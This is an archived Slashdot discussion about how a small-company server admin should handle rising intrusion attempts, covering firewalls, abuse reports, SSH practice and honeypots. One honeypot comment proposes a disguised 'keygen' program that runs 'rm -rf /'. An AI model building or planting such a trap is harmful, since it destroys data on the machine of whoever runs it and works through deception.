Slashdot Mirror


Dealing with Intruders?

drakyri asks: "I've been running a server for a small company for a few months. Recently, the number of attempted intrusions has jumped from about one every week to several per day - and these are only the really obvious attempts, like idiots who try to log in as root from the outside. The problem is that I'm not sure what to do about this. I've got their IP addresses and can usually tracert their ISP's - is there an accepted type of letter to send them without seeming like one of the corporate cease-and-desist gnomes?"

656 comments

  1. Easy by Anonymous Coward · · Score: 5, Insightful

    ignore them.

    Unless they use a lot of bandwidth, that is the right decission to make.

    1. Re:Easy by Phil+Karn · · Score: 4, Insightful
      Agreed. Just ignore them.

      These things are far too common to get worked up about, and they still consume an infinitesmal fraction of my link capacity. I long ago stopped caring about unsuccessful intrusion attempts. I only care about the successful ones, and to help prevent those I apply all the usual safeguards.

    2. Re:Easy by Anonymous Coward · · Score: 0

      I agree. And if you're not getting at least six different attacks (notwithstanding the dozens of probes from Windows worms) per day, you should check that your internet connection is working properly.

    3. Re:Easy by vivekg · · Score: 1

      Yup iggnore them!
      You have not mentioed what kind of box you got? If it is Linux based then best resource is get book called Securing & Optimizing Linux: The Hacking Solution (v.3.0) http://www.openna.com/products/books/books.php/; this book will help you to protect your Linux systems from unauthorized intrusions and other external attacks. :)

      --
      The important thing is not to stop questioning --Albert Einstein.
    4. Re:Easy by Anonymous Coward · · Score: 0

      I've gone one step further. These days I just laugh at them.

    5. Re:Easy by miniRMS · · Score: 1

      I usually find the best answer is a 12 gauge shotgun. R

    6. Re:Easy by hb253 · · Score: 3, Informative

      Agreed.

      A few years ago in my last job, we got hit with one of those viruses that hacks your web site (IIS of course) and modifies the home page to include bad words. We actually got the FBI involved.

      I got to talking with the agent and he basically said, unless someone actually intrudes into your system, you have no recourse. Atempts are one thing, actual intrusions are something else. Also, most likely, the activity you're seeing is viruses, not someone actively trying to break-in. Just keep your systems secure and patched and keep an eye on them.

      --
      Self awareness - try it!
    7. Re:Easy by JawFunk · · Score: 1

      When I was running Norton Internet Security 2003 on my Win 2K home PC, intrusions were in the 20s per day. I do not even own a business. I'm not sure how most of these attempts are triggered, but I presume it's other persons, not just adware (i run a clean ship).

      --
      [Please sign here]
    8. Re:Easy by eric76 · · Score: 2, Interesting

      In 1982 or so, I was working for a pipeline engineering company.

      One Saturday afternoon, I went to the office to do something on the computer (PDP 11/70). I was doing some disk work on the computer and didn't want anyone logged on accessing the disk while I did it.

      Before starting, I did a "systat" (system status command) and saw someone had dialed in from outside and was logged onto a games account.

      So I kicked him off, but he just dialed back in again. Every time I kicked him off, he was back in a minute.

      So I modified the login utility so that if you dialed in, it would tell you to call the number in the computer room and then drop the line.

      After a few minutes, he called! It sounded like a high school kid.

      I told him what I was doing and suggested he wait a while before calling back.

      After I finished what I was doing, I started wrote a little utility to take a snapshot of the system every six seconds and save the differences. I had a simple version working that evening and made some nice modifications to it the next couple of days.

      From then on, if he had ever logged back in, we could have detected just about anything he might do. But he never did log back onto the computer again.

      I never did know who the kid was, but my best guess was that it was the son of someone at the office.

    9. Re:Easy by Anonymous Coward · · Score: 0

      This is just minor when compared to the 24/7 dictionary attacks we are getting from spammer wannabes. But I've got some nasty surprises for them, and it seems to be quite sucessful.

      First, we configured our sendmail to rate limit the speed of attack.. Unfortunately, it will only go doen to one attempt per second. But at least the attempt winds up the /etc/mail/maillog

      These are easy to pull out, so we extract the IP addresses from these attacks and automatically report them to the ISP.

      Of course you have to have a large database of IP blocks vs "abuse" email hosts, but we do, and it's about 97% complete.

      Those NOT in our database are extracted and logged, and an automated script does a WHOIS and extracts it, which winds up in our "pending" section. we confirm the WHOIS data for accuracy then add it to our very large database.

      I might add, I noticed these attacks have significantly dropped off, as most of these IP's are from infected hosts, so if you do get these kinds of attacks, you can bet they are far removed from the actual individual probing your system or network.

      We then send a message to the appropriate "abuse", then tag an excerp of the maillog to the message, and aggregate them all into a single report (we would often get about 20 - 50 of these from a single IP address. We get these attacks from about 200 different IP addresses. We also build up a database, and generate reports which we keep if any ISP or law enforcement requests them, which has dates, times, IP addresses and other important information to aid them if they need it.

      We report about 5000 spams a day, resulting in the shutdown of about 200,000 infected hosts per month. We have noticed a clear corrilation between the IP blocks we get from spam, and those coming in from Dictionary attacks on our mail servers.

      I would like to share with with others, but cannot reveal my identity, for fear of getting killed by the mafia that controls these spam gangs and hackers that do these kinds of things, and because I'm a very big "thorn in the side" of these spam gangs wondering why they are loosing their huge supply of
      spam trojans so fast.

      Latest score is I used to get about 200 spams a day, now it's down to 70 or less.

    10. Re:Easy by Anonymous Coward · · Score: 0

      No you should track them down and kill them and their family!!!!!!!!!!!!!!!!!! Muwahahaha!

      It must be Friday.

  2. just forget it by Anonymous Coward · · Score: 1, Funny

    ignorance is bliss!

  3. Your firewall.... by paullush · · Score: 2, Insightful

    Add their IPs to your firewall for a start.

    1. Re:Your firewall.... by arcade · · Score: 5, Insightful

      Why?

      If they are just sending of SYN-requests, then who cares? They'll get a few RST-responses. Having your firewall bogged down by rules just to ignore some dialup user that'll probably have switched IPs the next day will just decrease others chances of contacting you.

      Secure your network. Have a nice firewall with okay rules, but there should be no need to add individual IPs to your ruleset all the time -- that just increases complexity and maintainability.

      --
      "Rune Kristian Viken" - http://www.nwo.no - arca
    2. Re:Your firewall.... by Anonymous Coward · · Score: 4, Interesting

      Yeah cause, there's no such thing as Dynamic IP addresses.

      Better advice would be to only allow login connections (eg sshd) from known IP addresses.

      Other measures depends on what services you are trying to secure, but make sure you've run through the http://www.cisecurity.com/ lvl 1 benchmarks on an Internet connected machine (at the very least run the scoring tool).

    3. Re:Your firewall.... by jhunsake · · Score: 4, Insightful

      Better yet, block everything and whitelist your shit.

    4. Re:Your firewall.... by jhunsake · · Score: 1

      Having your firewall bogged down by rules just to ignore some dialup user that'll probably have switched IPs the next day

      Actually, most of the machines attacking me recently have been compromised static-ip servers at various hosting providers.

    5. Re:Your firewall.... by paullush · · Score: 0

      Because some of the IPs will be static. Who said "Just SYN packets"??? If that, then theyre OS detection as ... Why tolerate that?

    6. Re:Your firewall.... by JPriest · · Score: 3, Insightful

      Exactly, why is he letting just anyone ssh into his boxes in the first place? Most of the services the company uses should be on private IP space inside of the firewall (NAT box), the rest of the devices on the outside need to be locked down good from Joe IP address.

      --
      Saying Java is nice because it works on all OS's is like saying that anal sex is nice because it works on all genders.
    7. Re:Your firewall.... by jaavaaguru · · Score: 2, Insightful

      Name and shame! ;-)

    8. Re:Your firewall.... by arcade · · Score: 5, Insightful

      Actually, most of the machines attacking me recently have been compromised static-ip servers at various hosting providers.

      It depends on what kind of 'attack' we're talking about, of course. If it's just an automated attack which scans large ranges of IP-addresses for common vulnerabilities which you've patched against, there really isn't any need to add them to your firewall ruleset, unless they're pretty invasive.

      By invasive I mean that they grope and poke, and grope and poke. If it's just a couple of packets - why care at all? You can always fire off an email to the hosting provider, but adding them to your firewall is just .. not necessary.

      Take the recent increase in SSH scans for the 'test' and 'guest' accounts without password, or whatever it was one came into agreement that it was.. if you've got a patched SSH daemon, why care? Let them scan - and get rejected. Why bog down the firewall with hundreds, if not thousands, of extra matching rules?

      If it's likely that you've got vulnerabile machines on that port, block it entirely - or just allow it from specific IPs. Playing whack-a-mole against scanners are just a waste of time.

      Patch the system, have a good general firewall ruleset that covers what needs to be covered - and let the scanners that isn't actually continously filling your log files just scan on.

      I've had to block _one_ abusive scanner during the last year. It was someone scanning for open http-proxies from Israel. They were hitting my machines several times per seconds, filling my apache logs with relay-attempts to mailservers. Which was quite frankly annoying.

      Those scans were from four IP's within the same subnet, and their ISP didn't care. I got the ISP null routed due to their customers filling my logs (and my company doesn't do business in Israel at the moment, so it wasn't a loss anyways).

      A few packets now and then on the other hand.. playing whack-a-mole with such is just a waste of time.

      --
      "Rune Kristian Viken" - http://www.nwo.no - arca
    9. Re:Your firewall.... by Anonymous Coward · · Score: 0

      Other possibility is to use two firewalls. FIrst is running some intrusion detection systems and automatically bans ip:s (f.e. 24 hours). Second have normal firewall rules.

    10. Re:Your firewall.... by NickRuisi · · Score: 1

      Become part of the Distributed Intrusion Detection System

      DShield

    11. Re:Your firewall.... by Anonymous Coward · · Score: 0

      But Whack-a-Mole was always my favorite game at Chucky Cheese's!

    12. Re:Your firewall.... by Anonymous Coward · · Score: 0

      Just run OpenBSD as your edge router(s), I've never had a problem, and on top of that nothing beats pf :)

    13. Re:Your firewall.... by Anonymous Coward · · Score: 0

      I should be able to do remote administration from any coffee shop. I love my work.

      So maybe I should implement port knocking?

    14. Re:Your firewall.... by JPriest · · Score: 1
      "I should be able to do remote administration from any coffee shop. I love my work."

      Needing access from a cofee shop does make things more difficult but there is no reason you couldn't ssh into a jump box and do your work from it. Add the jump box IP to the hosts you need access to, lock down the box and make it difficult for someone to find. e.g, bind ssh to a non-standard port and block icmp so someone probing your network does not stumble on it.

      This will greatly reduce the attack surface of your network.

      --
      Saying Java is nice because it works on all OS's is like saying that anal sex is nice because it works on all genders.
  4. DMCA by Amiga+Lover · · Score: 4, Funny

    Use the DMCA to... I don't know, scare them or something. Mention RIAA and MPAA to their ISPs too.

    1. Re:DMCA by Anonymous Coward · · Score: 4, Funny

      Tisk tisk, using the DMCA for something usefull is unpatriotic.

    2. Re:DMCA by Lord+Kano · · Score: 1

      That's a good idea. Can I copyright logging into my machines?

      If so, that's the way to go.

      LK

      --
      "Hi. This is my friend, Jack Shit, and you don't know him." - Lord Kano
    3. Re:DMCA by SloWave · · Score: 1

      This is not a bad idea actually. If a lawyer type can come up with a good way to apply the DMCA to the breakin attempts, then we can use an automated script to issue a DMCA letter to the offenders ISP. If I understand the DMCA correctly, the ISP has to take some action regarding the DMCA violation. The end result would be that the DMCA letters from the nasty 4 letter (MPAA, RIAA) scumbags would be buried in the noise. In effect a DoS of the DMCA.

    4. Re:DMCA by kurt555gs · · Score: 1

      Actually this is wonderfull idea, If every break in attempts ended in a DMCA take down or stop thief or whatever letter to an ISP, then perhaps the ISP's would begin to loath anything that smelled of DMCA.

      One way to pressure change.

      I hope some one starts a project on say Sourceforge to do this .

      Interestng thoughts

      Cheers

      --
      * Carthago Delenda Est *
    5. Re:DMCA by liam193 · · Score: 1

      Couldn't you put something in your motd that was written in a "code". As I understand it, you are in violation if I write my name as:

      mjbn204 (one letter and one number higher)
      or possibly even
      l|i|a|m|1|9|3

      and you attempt to decrypt it. You could create a junk login that has a /bin/false shell. Encrypt the password with some easily broken encryption and then claim a violation of the act when someone "decrypts" your text.

      Am I missing something here?

  5. Skript kiddiez by robogun · · Score: 4, Funny

    I haven't seen any similar increase in activity. Does your firm have enemies? For instance, does your first name rhyme with Carl?

    1. Re:Skript kiddiez by LiquidCoooled · · Score: 1

      no, but his domain is cso.com ;)

      --
      liqbase :: faster than paper
    2. Re:Skript kiddiez by Brightest+Light · · Score: 1

      do you run an sshd?
      I've seen a lot of brute force attempts on users like root and test of late. Seems I'm not the only one. Just firewall 'em out and get on with the rest of your day.

    3. Re:Skript kiddiez by Anonymous Coward · · Score: 0

      Uh, do you mean, Darl?

    4. Re:Skript kiddiez by Tassach · · Score: 1

      Yeah, I've been seeing those too for the last couple of weeks. Started out one a day, now it's up to a half-dozen. Still, that's less than the number of NIMDA/Code[Red|Blue] hits I'm still getting daily.

      --
      Why is it that the proponents of "one nation under God" are so eager to get rid of "liberty and justice for all"?
    5. Re:Skript kiddiez by Alsee · · Score: 1

      does your first name rhyme with Carl?

      Ouch, that was painful. Carl does not rhyme with Darl!

      -

      --
      - - You can't take something off the Internet! That's like trying to take pee out of a swimming pool.
  6. Abuse@ by craigske · · Score: 5, Informative

    The accepted way is to send an email to abuse@ or to the abuse contact listed by ARIN for the netblock you are trying to lart.

    http://www.arin.net
    or lookup the RADB abuse contact
    http://www.dnsstuff.org

    1. Re:Abuse@ by Anonymous Coward · · Score: 0

      I worked at the biggest ISP in my country and they were receiving so many emails to abuse@ that they didn't have time to process them. Mail was just ignored...
      Even more funny, one of our customer chose addresses like abuze@isp.com, abus@isp.com and was sending e-mails to other customers explaining there was an "abuse problem" with their account and they should send him their full details (with username and password of course) to investigate.

    2. Re:Abuse@ by csk_1975 · · Score: 1

      I've found sending mail to abuse@ doesn't help much, if you have the time and inclination (and the attackers ISP is a local call away) its much more effective to call them and complain. But as others have pointed out, why bother? Just ignore the attempts unless they are particularly nasty or obviously targeted at specific sensitive hosts.

    3. Re:Abuse@ by jrumney · · Score: 1
      But as others have pointed out, why bother?

      Because anti-social behaviour needs to be nipped in the bud. The script kiddie needs to know that fucking with other peoples systems has repercussions, and having his ISP threatening to cut him off is a good way to teach him that.

    4. Re:Abuse@ by Anonymous Coward · · Score: 0

      The point is that most complaints about "intrusion attempts" don't result in repercussions, simply because the "intruder" isn't breaking a law or a contract. There is nothing in the contract with my ISP which forbids portscanning (except in a DoS style) or trying to log into your systems. There's no law against these "intrusion attempts" either. The ISP couldn't threaten to disconnect me for that.

    5. Re:Abuse@ by blowdart · · Score: 1

      Unless the source IPs are in China, Korea or Brazil where no-one ever cares or fixes anything.

    6. Re:Abuse@ by Anonymous Coward · · Score: 0

      > Because anti-social behaviour needs to be nipped in the bud. The script kiddie
      > needs to know that fucking with other peoples systems has repercussions, and
      > having his ISP threatening to cut him off is a good way to teach him that.

      THEY MUST BE PUNISHED!! lol!

      Yeah, do that again and i'm going to send your ISP a really curt email!

    7. Re:Abuse@ by AllUsernamesAreGone · · Score: 4, Interesting

      At least in the UK (where I have themost experience fo computer laws), attempting to gain unauthorised access to a machine is a criminal offense under the Computer Misuse Act 1990, even conspiracy to do it is an offense. This is true whether you are a UK national or not - if you attack a machine in the UK and a report is passed to the police and the police investigation identifies you then the minute you set foot on British soil you could be arrested and prosecuted under the act (significant offenses may even result in extradition). I know several other countries have similar laws, I expect the US has as well.

    8. Re:Abuse@ by caluml · · Score: 3, Funny
      the minute you set foot on British soil

      Northern Ireland, Gibraltar, Hong Kong (not any more), Palestine (not any more), Australia (not any more), Canada (not any more), India (not any more), Malaysia (not any more), Yemen (not any more), Rhodesia (not any more), US (not any more)

      Damn. We're getting smaller. When did that happen?

    9. Re:Abuse@ by Anonymous Coward · · Score: 0

      I remember the good old days one the internet. Misuse your connection and you were cut off. Spam and hacker havens refusing to stop? Just talk to the people they are peering with and wave bye-bye. These days the ethics gone and replaced by the quest for profits.

    10. Re:Abuse@ by Dexx · · Score: 1

      www.abuse.net works for finding abuse email addresses as well, once you've got the domain.

      When you email them, make sure to include the relevant log files (not the entire thing, just the relevant bits) - they probably recieve hundreds or thousands of emails daily, depending on the size of the ISP.

      It's worth it to give them a call, if you can, to follow up. Find out what the policy is for that ISP - some give a number of warnings before they suspend/disconnect a user. If this is the case, find out how long you have to wait to cause another warning and send more data if the intrusion attempts continue.

      --
      Feel the fear and do it anyway.
    11. Re:Abuse@ by Anonymous Coward · · Score: 0

      Yeah, those were the dark ages, when the peasants were at the whim of the BOFH and bandwidth came in portions of a couple kbit/s unless you were part of an elite.

    12. Re:Abuse@ by suss · · Score: 1

      The accepted way is to send an email to abuse@ or to the abuse contact listed by ARIN for the netblock you are trying to lart.

      What if all email to abuse@ and the contact address in the whois info is simply bounced?

      Is there a 'higher authority' to which you can address your complaints to?

    13. Re:Abuse@ by Anonymous Coward · · Score: 0

      He should use the one automatically generated by Zone Alarm... ;)

    14. Re:Abuse@ by elemental23 · · Score: 1

      Then send your report to the offending network's upstream provider. Most large networks have the required role addresses (abuse, postmaster, etc) but small businesses often don't, usually due to clueless part-time network admins. Contact thier ISP and they'll contact their customer.

      --
      I like my women like my coffee... pale and bitter.
    15. Re:Abuse@ by elfuq · · Score: 2, Informative

      Isle of Man, Channel Islands.
      Gibraltar
      Monserrat
      British Virgin Islands
      British Indian Ocean Territory
      Pitcairn Island
      Ascension Island
      Falkland Islands
      South Georgia

    16. Re:Abuse@ by CFrankBernard · · Score: 1
    17. Re:Abuse@ by slittle · · Score: 1
      Australia (not any more)

      The Queen of England is still our Head of State. Mostly due to the fact that little johnny is a fucktard and sabotaged the referendum.
      --
      Opportunity knocks. Karma hunts you down.
  7. Create a honeypot by JVert · · Score: 4, Insightful

    If you seem to be getting it from the same group of people make a honeypot but have some obvious hints once they get in, leave very little on the server and put the logs of their activity in an obvious place. Just be sure to isolate that machine from the rest of the network so if they do end up owning it they got no further then their failed attempt at your real machines.

    1. Re:Create a honeypot by Anonymous Coward · · Score: 0

      The point being...?

    2. Re:Create a honeypot by Anonymous Coward · · Score: 2, Interesting

      This probably would have to be the best option so far. Then you could also log how they cracked the machine (using another machine). This would let you secure your other machines as well.

      (I've been told to say, "you're a facsist" so I did)

    3. Re:Create a honeypot by Anonymous Coward · · Score: 0

      your suggestion is not valid.
      it should read "no further THAN their failed attempt..."

    4. Re:Create a honeypot by welshwaterloo · · Score: 5, Interesting

      IMHO - If you're not completely sure your network is 101% secure, or you don't have several free hours a day it would be a bad idea to drop a honeypot anywhere near your network.

      Think about it - it's a slap in the face to the would-be hacker.. It's like you're leading him on, then saying "Ner Ner!" when he breaks into the pot.
      If your hacker is serious, he's gonna be really pissed about this.

      Secure your network & keep it secure - no need to stir 'em up.

    5. Re:Create a honeypot by Anonymous Coward · · Score: 0

      Hey, a database record of just off credit card numbers might just take care of that real quick. Maybe be a REAL bitch, and make the first number and data real, but for a corprate card with a low per transaction and total limit. Or even contact customer service people for the people doing your corprate credit and see if they can come up with something even more wicked. But the number of people you could catch for $100 or so bucks a month might just be worth it to everyone involved. A serious hacker can be as pissed off as he wants when some 250 lb guy with 5% body fat is standing on his neck talking about how it's been months since he's seen sunlight and "such a pretty 'girl'" (facts which happen to be related).

    6. Re:Create a honeypot by ayjay29 · · Score: 2, Interesting

      I agrre with the above. Also creating a honeypot will give these guys something to play with, something fun to do, which will mean they will be more likely to come back.

      If they can't get anywhere, they will move on somewhere else...

      --
      Offtopic, Inflammatory, Inappropriate, Illegal, or Offensive comments might be moderated up.
    7. Re:Create a honeypot by 16K+Ram+Pack · · Score: 1

      Put some goatse images on there. That ought to get the message across.

    8. Re:Create a honeypot by Anonymous Coward · · Score: 2, Funny

      Bah, pissing them off is fun. I did that quite a bit in the 90's when I ran an ISP. certian accounts that I nevr logged in as I changed the /bin/sh in the passwd file to /bin/biteme and had a nice 10 line c program that simply flooded the screen with profanity ended with, "go away loser" and then exited logging them off cince there is no shell. It took no input so no buffer overflows are possible.

      I was entertained by the more "pissed" hackers that ran into that. espically the ones with so little self control they would email me insults at administrator@myisp (A true sign of a poser-cracker, a real cracker is not stupid enough to start emailing the target.... a real cracker is silent as a mouse.)

      go ahead and piss them off, the real ones dont get pissed.

    9. Re:Create a honeypot by Lord+Kano · · Score: 1

      Think about it - it's a slap in the face to the would-be hacker.. It's like you're leading him on, then saying "Ner Ner!" when he breaks into the pot.

      Crackers understand that it's all a part of the game. Move and counter move. If you're careful enough, having a honeypot would be harmless.

      LK

      --
      "Hi. This is my friend, Jack Shit, and you don't know him." - Lord Kano
    10. Re:Create a honeypot by NickRuisi · · Score: 1

      Just make sure theres no physical link between the honeypot and your network. If you want to examine the system after the investigation, remove the disks and mount them on another system with no execute permissions.

      I put a 100 Mbps switch between my firewall and my router for this purpose. Have 1 address in each of my blocks not ARP'd to go to the firewall for this purpose.

    11. Re:Create a honeypot by welshwaterloo · · Score: 1
      >Crackers understand that it's all a part of the game. Move and counter move.

      in all politeness, that's the point of my suggestion. Do you want to get in a cat & mouse game with someone(s) who has the potential to take down your site/services, or do you want to ignore them & get on with your day?

      From SANS http://www.sans.org/resources/idfaq/honeypot3.php
      Some caveats exist that should be considered when implementing a Honey pot system. Some of the more important are:
      The first caveat is the consideration that if the information gathered from a Honey Pot system is used for prosecution purposes, it may or may not be deemed admissible in court. While information regarding this issue is difficult to come by, having been hired as an expert witness for forensic data recovery purposes, I have serious reservations regarding whether or not all courts will accept this as evidence or if non-technical juries are able to understand the legitimacy of it as evidence.

      The second main caveat for consideration is whether hacking organizations will rally against an organization that has set "traps" and make them a public target for other hackers. Examples of this sort of activity can be found easily on any of the popular hacker's sites or their publications.

    12. Re:Create a honeypot by Lord+Kano · · Score: 1

      Do you want to get in a cat & mouse game with someone(s) who has the potential to take down your site/services, or do you want to ignore them & get on with your day?

      If you draw the ire of a cracker or script kiddie, you're better off having him fuxor around with a machine that can cause no real harm to you than you are getting ddosed by his 250 compromised zombies.

      I have serious reservations regarding whether or not all courts will accept this as evidence or if non-technical juries are able to understand the legitimacy of it as evidence.

      True enough about the admissability is a very valid concern, but even a non-technical jury can understand the concept of an IP address if you put it in simple enough terms. Tracking incoming traffic by IP could be presented like saving caller id information when you get an obscene telephone call. Sure WE know that caller ID can be faked too, but we're talking about non-technical jurors. For them, that comparison would be enough.

      LK

      --
      "Hi. This is my friend, Jack Shit, and you don't know him." - Lord Kano
    13. Re:Create a honeypot by glesga_kiss · · Score: 1

      Personally, I'd put lots of tanalising fake files on the honey pot. Say a small C app with "rm -rf /" in it called "XP SP2-safe keygen.exe". Make the app self destructing, with maybe a "Got One!!" e-mail sent to yourself for shits & giggles. Things that'll really screw them up. Or a few AVI goatse's with interesting titles. :-)

    14. Re:Create a honeypot by Anonymous Coward · · Score: 0

      Honeypots are very dodgy from a legal point of view (certainly in UK law.) I did a course by @Stake (formerly the L0pht) where they pointed out that by making a honeypot you implicitly grant access to anyone who wants it, as there is no point for a honeypot to exist if not for uninvited users to try to access it.

      You are not going to get anywhere in court prosicuting someone for using a honeypot machine.

    15. Re:Create a honeypot by Awptimus+Prime · · Score: 1

      Funny story, but this does not work well in the 2000's.

      I recall when the ISP I worked for put up an IRC server. They gave me admin on it and several times, upon issuing k-lines on script kiddies, our entire OC48 was soon saturated DDoS packets and ransom emails to ircadmin@isp..

      This is funny to me as an individual, but was not to all the thousands of customers who's email and websites were slow/dead for 24+ hours at a time.

      I guess what I am trying to say is: It is irrisponsible to rattle the chains of those who wish to do your employer harm.

    16. Re:Create a honeypot by farble1670 · · Score: 1

      so what you are saying is, don't piss your attacker off, because he then might commit even more crimes against you? reminds me of keeping a few bills handy when travelling, in case you're mugged. not sure how i feel about that. even though that may be the reality of dealing with some situations, it hardly seems like a good attitude to take in general.

    17. Re:Create a honeypot by farble1670 · · Score: 1

      that's an interesting idea that for some reason i never thought of. if someone is serious about catching offenders, this seems like a good way. reminds me of watching COPS on TV, and how they bait johns with lady officers acting as hookers.

      i don't know that this, in general, ethical. it seems to border on entrapement. but if you really want to catch the offenders, this seems like a good way. of course you'd need a dedicated resource for this since it is surely time consuming. i suppose the idea would be to give offenders a message, that any machine they compromise might be a trap for them.

    18. Re:Create a honeypot by Bargeld · · Score: 1

      And conversely, if you ARE "completely sure your network is 101% secure", you really ought to lay off the potent mind-altering drugs.

      Incidentally, in my experience, the hacker in these scenarios isn't likely to be "really pissed", just mildly annoyed that he can't fire up his eggdrop or warez site. They'll play for a bit, to get some attention, and then move on to greener pastures.

      --Bargeld

      --
      "I hate to advocate drugs, alcohol, violence, or insanity to anyone. But they've always worked for me." --Dr. Hunter S.
  8. Wow! A spike in hack attempts? by angryLNX · · Score: 3, Insightful
  9. I tried to log in as root.. by Anonymous Coward · · Score: 5, Funny

    on my University's network more than once. I ran Linux and I got into the habit of logging in as root, and sometimes I'd try to log in without thinking just after starting a telnet session. I didn't receive any notice from the U, but in this post-9/11 hellmouth, I'm sure I'd have been reported to the FBI as a potential terrorist.

    1. Re:I tried to log in as root.. by GodEater · · Score: 2, Insightful

      Let me get this straight - you "got used" to logging in as root? And to compound your folly, you used to do it over *TELNET* ?!?!?!

      I think someone needs to read up a bit more on why both these things are bad ideas - and why doing them both at once is just internet suicide...

      --

      Gentlemen, start your penguins

    2. Re:I tried to log in as root.. by meringuoid · · Score: 4, Insightful
      I ran Linux and I got into the habit of logging in as root,

      Unwise.

      and sometimes I'd try to log in without thinking just after starting a telnet session.

      Over telnet? Log in as root over telnet? AAAARRRGGGHHH!

      --
      Real Daleks don't climb stairs - they level the building.
    3. Re:I tried to log in as root.. by DanMc · · Score: 0, Troll

      I accidentally log in as root all the time. I have to do 90% of my linux work as root (editing /etc files and stopping and starting daemons), so if I ssh or scp to an outside network, It uses my current user name by default: root. And even when I get a login: prompt, my natural instinct is type root.

      That said, I have seen an increase of root/guest/temp/ ssh login attempts on my home DSL router/firewall. The IPs tend to be similar to mine, and there are 7-10 attempts in a row. So I'm guessing there is script or worm on the lose that searches nearby IPs for vulnerable hosts.

    4. Re:I tried to log in as root.. by Anonymous Coward · · Score: 0

      > on my University's network more than once. I ran Linux and I got into the habit of
      > logging in as root, and sometimes I'd try to log in without thinking just after
      > starting a telnet session. I didn't receive any notice from the U, but in this
      > post-9/11 hellmouth, I'm sure I'd have been reported to the FBI as a potential
      > terrorist.

      Only if you are of arabic race or have an arabic name.

    5. Re:I tried to log in as root.. by Anonymous Coward · · Score: 0

      As it should be--statistically speaking. Profiling may be impolitic, but it is a valid approach.

    6. Re:I tried to log in as root.. by Anonymous Coward · · Score: 0

      ...but only if you also took photos of the servers ;-)

    7. Re:I tried to log in as root.. by groovemaneuver · · Score: 1

      People!!! use "sudo". It's really not that hard to not use root. You're tempting fate if your systems allow root logins to anything but the console. At the very least, use "su".

      [end rant]

    8. Re:I tried to log in as root.. by jdtanner · · Score: 1

      ...and all I got was this lousy t-shirt? :-)

    9. Re:I tried to log in as root.. by Lord+Kano · · Score: 1

      I decided to check the logs on my main linux machine, I have ALL KINDS of attempts to log in as test/admin/user/guest most recently 2 days ago.

      I'm suddenly tempted to enable guest but make the shell DOSEMU. Imagine a script kiddy's frustration at that turn of events.

      LK

      --
      "Hi. This is my friend, Jack Shit, and you don't know him." - Lord Kano
    10. Re:I tried to log in as root.. by PatrickThomson · · Score: 1

      Ok, so we all love sudo, which is fine for the odd command, but prepending every single line with 3 characters does get a tad irritating after a while.

      --
      I am one of many. My idea is not unique, nor do I expect my voice alone to sway you. I speak in a chorus of opinion.
    11. Re:I tried to log in as root.. by Lord+Kano · · Score: 5, Funny

      Only if you are of arabic race or have an arabic name.

      Arabic isn't a race. Arabs, technically, are caucasians. They're just curly haired, tanned white people. Not entirely unlike Italians.

      LK

      --
      "Hi. This is my friend, Jack Shit, and you don't know him." - Lord Kano
    12. Re:I tried to log in as root.. by Handpaper · · Score: 1
      Damn straight!
      I don't allow root logins to any of my machines or any of the services running on them, local or remote.
      Login as a valid user, then su or sudo if I need root privileges - and restrict the users who can su.

    13. Re:I tried to log in as root.. by Pentagram · · Score: 1

      Well I've occasionally (not habitually) tried to su to root on remote systems (over ssh!) simply by forgetting which terminal I was typing in.

      Surely single attempts to gain access as root can't be considered as a deliberate attempt at intrusion. Does this not happen to anyone else?

    14. Re:I tried to log in as root.. by Junichiro+Koizumi · · Score: 0

      No we don't love sudo. Have you people been actively ignoring the massive security holes found in that God-forsaken load of garbage in the past few years?

    15. Re:I tried to log in as root.. by Anonymous Coward · · Score: 0

      Theres a university *cough*137.155/16 netblock*cough* that I know of that dont allow SSH to their machines, and only allow telnet.... not to mention more than one user has UID 0.....

    16. Re:I tried to log in as root.. by dossen · · Score: 1

      I'm pretty sure it does. Or forgetting to use $USER@$HOST when sshing into another machine from a user you are not normally using.

    17. Re:I tried to log in as root.. by c · · Score: 2, Insightful

      ]] and sometimes I'd try to log in without thinking just after
      ]] starting a telnet session.


      ] Over telnet? Log in as root over telnet? AAAARRRGGGHHH!

      So how did you remotely administer Unix boxes prior to ssh?

      c.

      --
      Log in or piss off.
    18. Re:I tried to log in as root.. by LearnToSpell · · Score: 2, Funny

      Most of these people weren't alive before ssh.

    19. Re:I tried to log in as root.. by sam1am · · Score: 1
      % sudo -s

      -s The -s (shell) option runs the shell specified by the SHELL envi- ronment variable if it is set or the shell as specified in passwd(5).
    20. Re:I tried to log in as root.. by Anonymous Coward · · Score: 0

      So how did you remotely administer Unix boxes prior to ssh?

      rsh? ;)

    21. Re:I tried to log in as root.. by Anonymous Coward · · Score: 0

      The media must be lying about who was responsible for Oklahoma City, then.

    22. Re:I tried to log in as root.. by dmitriy · · Score: 1

      So, how many people on the University network knew your root password?

    23. Re:I tried to log in as root.. by Rudeboy777 · · Score: 1

      This is what's called knowing just enough to be dangerous.

      --

      From hell's heart I fstab at /dev/hdc

    24. Re:I tried to log in as root.. by radish · · Score: 1

      telnet's fine if it's a private network...

      --

      ---- Den ene knappen er powerknapp, den andre er Bender voice knapp "Bite My Shiny Metal Ass"

    25. Re:I tried to log in as root.. by thisissilly · · Score: 2, Funny
      So how did you remotely administer Unix boxes prior to ssh?

      Log in as a normal user, and su, of course.

    26. Re:I tried to log in as root.. by Anonymous Coward · · Score: 0

      Arabic isn't a race. Arabs, technically, are caucasians. They're just curly haired, tanned white people. Not entirely unlike Italians.

      I resent the comparison between the Italian people and those cut-throats. Lets make that place a huge parking lot and be done with it.

    27. Re:I tried to log in as root.. by c · · Score: 2, Insightful

      Log in as a normal user, and su, of course.

      Tell me this is a troll. Please.

      c.

      --
      Log in or piss off.
    28. Re:I tried to log in as root.. by Anonymous Coward · · Score: 0

      "Arabs [are] ... Not entirely unlike Italians."

      Except for their taste. ... in uh, clothes! Ya.

    29. Re:I tried to log in as root.. by Anonymous Coward · · Score: 0

      You are absolutely right! We need to get rid of those nasty caucasians and all these pointless wars they've been starting!

    30. Re:I tried to log in as root.. by darkonc · · Score: 1
      Log in as a normal user, and su, of course.

      Just to remove any ambiguity: That only handles the 'logging in as root' problem, but it doesn't solve the 'password in cleartext' problem -- especially the 'root password in cleartext' problem.

      In the pre-ssh days, I used to login as a non-root user then do the su thing, but I'd do all sorts of things to obfuscate the fact that I was doing an 'su' and the password I used when doing the su..

